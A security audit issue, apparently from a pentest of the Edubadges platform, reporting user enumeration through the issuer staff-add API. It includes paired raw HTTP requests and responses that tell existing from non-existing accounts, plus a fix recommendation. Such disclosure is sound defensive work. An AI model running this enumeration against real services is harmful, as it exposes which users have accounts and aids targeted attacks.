search

edubadges / audit

Code audit repo for Edubadges
0 stars 0 forks source link

User Enumeration using the issuer manage staff functionality #8

Open sveeke opened 6 years ago

sveeke commented 6 years ago

When adding a new staff member to an issuer it responses allows to determine if an user exists or not.

sveeke commented 6 years ago

threatLevel="Low" type="Account Enumeration"

When adding a new staff member to an issuer it response allows to determine if a user exists or not.

image

Non-existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"stefanpentest+admin@gmail.com","role":"owner"}

HTTP/1.1 404 Not Found
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:48:53 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 76

"User not found. Email must be verified and correspond to an existing user."

Existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"stefanpentest+administrator@gmail.com","role":"owner"}

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:49:10 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 149

{"user":{"first_name":"Stefan","last_name":"Pentest","email":"stefanpentest+administrator@gmail.com","slug":"OhBbDf5TQ-mc1ARkS6gOwA"},"role":"owner"}

Impact: Existing user accounts can be enumerated by guessing email addresses.

Recommendation: Ensure the responses for existing and non-existing users match exactly so that attackers cannot differentiate.